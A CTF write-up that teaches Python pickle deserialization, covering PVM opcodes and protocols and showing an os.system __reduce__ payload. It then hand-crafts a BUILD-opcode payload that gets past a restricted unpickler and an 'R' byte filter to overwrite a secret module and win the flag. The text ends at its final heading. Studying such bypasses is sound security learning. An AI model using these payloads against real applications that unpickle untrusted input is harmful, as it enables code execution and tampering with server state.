What is Pickle?
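Introduction
A few days ago I read p牛's article on pickle deserialization, and a competition happened to include a challenge on exactly that, which gave me a chance to deepen my understanding through practice. First, though, I need to know what pickle deserialization actually is.
pickle is a stack-based language that runs on a lightweight PVM (Pickle Virtual Machine). The PVM consists mainly of an instruction processor, a stack, and a memo.
- Instruction processor: parses and executes opcodes and their arguments. The value left on top of the stack at the end is returned as the deserialized object.
- stack: temporarily holds data, arguments, and objects. It is implemented as a Python list and can be thought of as the machine's memory.
- memo: provides storage for the whole lifetime of the PVM. It is implemented as a Python dict and can be thought of as the machine's disk.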
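To make the roles of the stack and the memo concrete, here is a minimal sketch with a hand-written protocol 0 pickle. The byte string is my own illustration and does not come from the challenge.

```python
import pickle

# Hand-written protocol 0 pickle (illustrative, not from the challenge):
#   I1\n  push the integer 1 onto the stack
#   p0\n  PUT: copy the stack top into memo slot 0
#   0     POP: discard the stack top, leaving the stack empty
#   g0\n  GET: push memo slot 0 back onto the stack
#   .     STOP: return whatever is on top of the stack
data = b"I1\np0\n0g0\n."

value = pickle.loads(data)
print(value)
```

The value survives the POP only because it was copied into the memo first, which is the sense in which the memo outlives individual stack entries.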
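Instruction set
In the Python versions this post targets (3.4 through 3.7) there are five pickle protocols; Python 3.8 later added protocol 5 and made protocol 4 the default. The higher the protocol version used, the more recent the Python version needed to read the resulting pickle.
- Protocol 0 is the original "human-readable" protocol and is backward compatible with earlier versions of Python.
- Protocol 1 is an older binary format that is also compatible with earlier versions of Python.
- Protocol 2 was introduced in Python 2.3. It provides a much more efficient mechanism for pickling new-style classes. See PEP 307 for the improvements it brings.
- Protocol 3 was added in Python 3.0. It has explicit support for bytes objects and cannot be unpickled by Python 2.x. It is the default protocol in Python 3.0 through 3.7, and the recommended one when compatibility with other Python 3 versions is required.
- Protocol 4 was added in Python 3.4. It supports very large objects, can pickle more kinds of objects, and includes some data format optimizations. See PEP 3154 for the improvements it brings.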
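As a rough illustration of how the protocols differ on the wire, the sketch below pickles the same object with every protocol the running interpreter supports. The sample object is arbitrary, and the sizes printed will vary between Python versions.

```python
import pickle

obj = {"name": "giaogiao", "tags": [1, 2, 3]}

for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
    data = pickle.dumps(obj, protocol=proto)
    # Protocols >= 2 start with the PROTO opcode (0x80) followed by the version byte.
    has_header = data[:1] == b"\x80"
    print(proto, len(data), has_header, pickle.loads(data) == obj)

print("default:", pickle.DEFAULT_PROTOCOL, "highest:", pickle.HIGHEST_PROTOCOL)
```

Protocols 0 and 1 carry no version header, which is why a hand-written protocol 0 payload can begin directly with an opcode.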
Every opcode can be looked up in the pickle source code. The listing is pasted below (it is long and can be skipped).
# Pickle opcodes. See pickletools.py for extensive docs. The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long
# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes
# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame
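Rather than scanning the listing by eye, the same information can be queried from the standard library. This is a small sketch using `pickletools.code2op`; the selection of opcodes is mine.

```python
import pickletools

# pickletools.code2op maps each one-character opcode to its OpcodeInfo record.
for code in ("c", "R", "b", "o", "i", "\x93"):
    info = pickletools.code2op[code]
    print(repr(code), info.name, "protocol", info.proto)
```

Each `OpcodeInfo` record also carries a `doc` attribute with the long-form description from pickletools.py.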
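Pickle serialization
Pickle payloads are produced mainly in two ways: through the __reduce__ magic method, or by writing the opcodes by hand.
- The __reduce__ method
import os
import pickle

class exp(object):
    def __reduce__(self):
        s = r"""touch /tmp/success"""
        return (os.system, (s,))

print(pickle.dumps(exp(), protocol=0))
# Output when run on Windows, where os.system is pickled as nt.system:
# b'cnt\nsystem\np0\n(Vtouch /tmp/success\np1\ntp2\nRp3\n.'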
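- Hand-written opcodes, which can be debugged and analyzed with pickletools
$ python -m pickletools pickle.txt
    0: c    GLOBAL     'nt system'            # push the callable nt.system (os.system on Windows; on Linux it would be posix.system)
   11: p    PUT        0                      # store that object in memo slot 0
   14: (    MARK                              # push a mark for the start of a tuple
   15: V    UNICODE    'touch /tmp/success'   # push a string
   35: p    PUT        1                      # store the string in memo slot 1
   38: t    TUPLE      (MARK at 14)           # pop everything pushed since the mark and push it back as one tuple
   39: p    PUT        2                      # store the tuple in memo slot 2
   42: R    REDUCE                            # pop the tuple and the callable, call it, and push the result
   43: p    PUT        3                      # store the stack top (the call's result) in memo slot 3
   46: .    STOP                              # end
highest protocol among opcodes = 0            # protocol 0
The corresponding payload, one instruction per line:
b'''cnt
system
p0
(Vtouch /tmp/success
p1
tp2
Rp3
.'''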
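Note: conventions for writing PVM instructions by hand
(1) Every opcode is a single byte.
(2) In the text-based protocol 0 used here, an instruction's argument is terminated by a newline.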
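Both routes can be tried safely by swapping the shell command for a harmless callable. The sketch below is my own variation on the examples above: `Demo` and the `len('abc')` payload are illustrative stand-ins, not part of the original write-up.

```python
import io
import pickle
import pickletools


class Demo:
    # Harmless stand-in for the os.system example: unpickling calls int("42").
    def __reduce__(self):
        return (int, ("42",))


generated = pickle.dumps(Demo(), protocol=0)

# Hand-written protocol 0 payload: GLOBAL builtins.len, MARK, UNICODE 'abc',
# TUPLE, REDUCE, STOP. Unpickling it calls len('abc').
handwritten = b"cbuiltins\nlen\n(Vabc\ntR."

# Disassemble the hand-written payload into a string instead of stdout.
listing = io.StringIO()
pickletools.dis(handwritten, out=listing)
print(listing.getvalue())

print(pickle.loads(generated), pickle.loads(handwritten))
```

In both cases the callable runs during `pickle.loads`, and the object that comes back is the call's return value rather than an instance of the pickled class.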
Challenge analysis
The challenge is called webtmp. Its source code follows.
import base64
import io
import sys
import pickle

from flask import Flask, Response, render_template, request
import secret

app = Flask(__name__)


class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __repr__(self):
        return f'Animal(name={self.name!r}, category={self.category!r})'

    def __eq__(self, other):
        return type(other) is Animal and self.name == other.name and self.category == other.category


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__':
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()


def read(filename, encoding='utf-8'):
    with open(filename, 'r', encoding=encoding) as fin:
        return fin.read()


@app.route('/', methods=['GET', 'POST'])
def index():
    if request.args.get('source'):
        return Response(read(__file__), mimetype='text/plain')

    if request.method == 'POST':
        try:
            pickle_data = request.form.get('data')
            if b'R' in base64.b64decode(pickle_data):
                return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'
            else:
                result = restricted_loads(base64.b64decode(pickle_data))
                if type(result) is not Animal:
                    return 'Are you sure that is an animal???'
            correct = (result == Animal(secret.name, secret.category))
            return render_template('unpickle_result.html', result=result, pickle_data=pickle_data, giveflag=correct)
        except Exception as e:
            print(repr(e))
            return "Something wrong"

    sample_obj = Animal('giaogiao', 'Giao')
    pickle_data = base64.b64encode(pickle.dumps(sample_obj)).decode()
    return render_template('unpickle_page.html', sample_obj=sample_obj, pickle_data=pickle_data)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)
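Two key points stand out:
- The input is unpickled, but find_class only allows names looked up on sys.modules['__main__'], and any payload containing the byte R (the REDUCE opcode) is rejected up front.
- When correct is True, the flag is returned.
Judging from the check, we need to unpickle an Animal object whose attributes equal the name and category in secret. That passes the comparison and yields the flag.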
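To see the two defenses in isolation, the sketch below reproduces the challenge's `RestrictedUnpickler` and wraps it in a small helper. `try_load` is a hypothetical name of mine that mirrors the order of checks in `index()`, and the sample payloads are illustrative.

```python
import io
import pickle
import sys


class RestrictedUnpickler(pickle.Unpickler):
    # Same whitelist as the challenge: only names looked up on __main__ are allowed.
    def find_class(self, module, name):
        if module == "__main__":
            return getattr(sys.modules["__main__"], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def try_load(data):
    # Hypothetical helper mirroring index(): the byte filter first, then the unpickler.
    if b"R" in data:
        return "blocked by R filter"
    try:
        return RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return f"blocked by find_class: {exc}"


# Classic REDUCE payload: stopped by the byte filter before it is ever parsed.
print(try_load(b"cbuiltins\nlen\n(Vabc\ntR."))
# A global outside __main__, without REDUCE: stopped by find_class.
print(try_load(b"cbuiltins\nlen\n."))
# Plain data needs no global lookup at all, so it loads.
print(try_load(b"(lp0\nI1\naI2\na."))
```

Note that the filter is a plain substring test, so it also rejects harmless pickles that merely contain an uppercase R inside a string.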
secret.py is not provided with the challenge, but it is not hard to guess roughly what it looks like:
# secret.py
name = "xxx"
category = "?????"

# test (run inside the challenge script, where sys and secret are already imported)
a = sys.modules['__main__'].secret.name
print(a)  # xxx
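From here there are a couple of possible approaches:
- Read the name and category values out of secret and use them to create the Animal object.
- Overwrite name and category, then create the Animal object from the values we wrote.
The first approach did not work: after many attempts I found no way to reach __main__.secret.name from inside the pickle.
So I turned to the second approach. While reading through the documentation for the various pickle protocols, I found in the protocol 2 material
that unpickling can modify an object's attributes (the opcode itself is available in every protocol). The corresponding opcode is: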
BUILD = b'b' # call __setstate__ or __dict__.update()
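That makes the plan clear: first overwrite the attribute values, then create the Animal object. The next step is to write the pickle opcodes by hand.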
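The effect of BUILD on a module can be checked locally before touching the real target. This is a minimal sketch under stated assumptions: `fake_secret` is a stand-in module with made-up values, and `DemoUnpickler` is a hypothetical resolver that maps `__main__.secret` to that stand-in.

```python
import io
import pickle
import types

# Stand-in for the challenge's secret module; the real values are unknown.
fake_secret = types.ModuleType("secret")
fake_secret.name = "real-name"
fake_secret.category = "real-category"


class DemoUnpickler(pickle.Unpickler):
    # Hypothetical resolver: only ("__main__", "secret") is mapped, to the stand-in.
    def find_class(self, module, name):
        if (module, name) == ("__main__", "secret"):
            return fake_secret
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


# GLOBAL pushes the module, '}' pushes an empty dict, each S.../S.../s triple
# sets one key, and BUILD ('b') merges the dict into the module's __dict__.
payload = b"c__main__\nsecret\n}S'name'\nS'xxxxx'\nsS'category'\nS'yyyyy'\nsb."

result = DemoUnpickler(io.BytesIO(payload)).load()
print(result is fake_secret, fake_secret.name, fake_secret.category)
```

Because a module has no `__setstate__`, BUILD falls back to updating `__dict__`, and the payload never needs the filtered R opcode.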
Building the payload
import base64
import pickle

# Part 1: pass a dict to BUILD to overwrite the attributes of secret
payload_1 = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sb.'''

# Part 2: construct the object. Animal is the class from the challenge source
# and must be defined in __main__ so that it pickles as __main__.Animal.
exp = Animal("xxxxx", "yyyyy")
payload_2 = pickle.dumps(exp, protocol=3)  # protocol 3 reproduces the bytes below
#b'''\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''

# Merged payload: part 1 without its trailing STOP ('.'), followed by
# part 2 without its PROTO header (\x80\x03)
payload = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sbc__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
print(base64.b64encode(payload))
#Y19fbWFpbl9fCnNlY3JldAp9UyduYW1lJwpTJ3h4eHh4JwpzUydjYXRlZ29yeScKUyd5eXl5eScKc2JjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAeHh4eHhxBFgIAAAAY2F0ZWdvcnlxBVgFAAAAeXl5eXlxBnViLg==
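The merged payload can be sanity-checked offline before it is submitted. The sketch below is only an approximation of the server: `fake_main` and its `secret` are stand-in modules with invented values, and `LocalUnpickler` is a hypothetical copy of the challenge's rule that resolves names against `fake_main` instead of the real `__main__`.

```python
import io
import pickle
import types


class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __eq__(self, other):
        return type(other) is Animal and self.name == other.name and self.category == other.category


# Stand-ins for the server's __main__ and secret modules (real values unknown).
fake_main = types.ModuleType("fake_main")
fake_main.Animal = Animal
fake_main.secret = types.ModuleType("secret")
fake_main.secret.name = "real-name"
fake_main.secret.category = "real-category"


class LocalUnpickler(pickle.Unpickler):
    # Same rule as the challenge, but resolved against fake_main.
    def find_class(self, module, name):
        if module == "__main__":
            return getattr(fake_main, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


# Same bytes as the merged payload, written with explicit escapes.
payload = (
    b"c__main__\nsecret\n}S'name'\nS'xxxxx'\nsS'category'\nS'yyyyy'\nsb"
    b"c__main__\nAnimal\nq\x00)\x81q\x01}q\x02("
    b"X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04"
    b"X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub."
)

assert b"R" not in payload  # would be rejected by the server's byte filter
result = LocalUnpickler(io.BytesIO(payload)).load()
correct = result == Animal(fake_main.secret.name, fake_main.secret.category)
print(type(result) is Animal, correct)
```

The overwritten module stays on the stack underneath the Animal instance, but STOP only returns the top item, so the type check still sees an Animal.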
Getting the flag